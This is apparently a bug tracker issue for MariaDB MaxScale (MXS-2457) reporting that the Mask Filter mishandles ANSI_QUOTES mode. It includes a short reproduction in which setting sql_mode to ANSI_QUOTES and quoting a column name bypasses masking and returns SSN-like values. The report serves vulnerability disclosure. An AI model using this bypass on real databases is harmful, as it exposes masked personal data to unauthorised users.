Uploaded image for project: 'MariaDB MaxScale'
  1. MariaDB MaxScale
  2. MXS-2457

MaxScale Mask Filter incorrectly handles ANSI_QUOTES

    XMLWordPrintable

    Details

    • Sprint:
      MXS-SPRINT-81

      Description

      The query classifier does not take into account ANSI_QUOTES mode, allowing a malicious user to bypass firewall filter rules.

      mysql> select concat(ssn) from managers;
      		 
      ERROR 1141 (HY000): The function concat is used in conjunction with a field that should be masked for 'maxuser'@'::ffff:127.0.0.1', access is denied.
      		 
       
      		 
      mysql> set @@sql_mode = 'ANSI_QUOTES';
      		 
      Query OK, 0 rows affected (0.00 sec)
      		 
       
      		 
      mysql> select concat("ssn") from managers;
      		 
      +---------------+
      		 
      | concat("ssn") |
      		 
      +---------------+
      		 
      | 111-22-3333   |
      		 
      | 444-55-6666   |
      		 
      +---------------+
      		 
      2 rows in set (0.00 sec)

        Attachments

          Activity

            People

            Assignee:
            johan.wikman Johan Wikman
            Reporter:
            ctarquini Christopher Tarquini
            Votes:
            0 Vote for this issue
            Watchers:
            1 Start watching this issue

              Dates

              Created:
              Updated:
              Resolved:

                Git Integration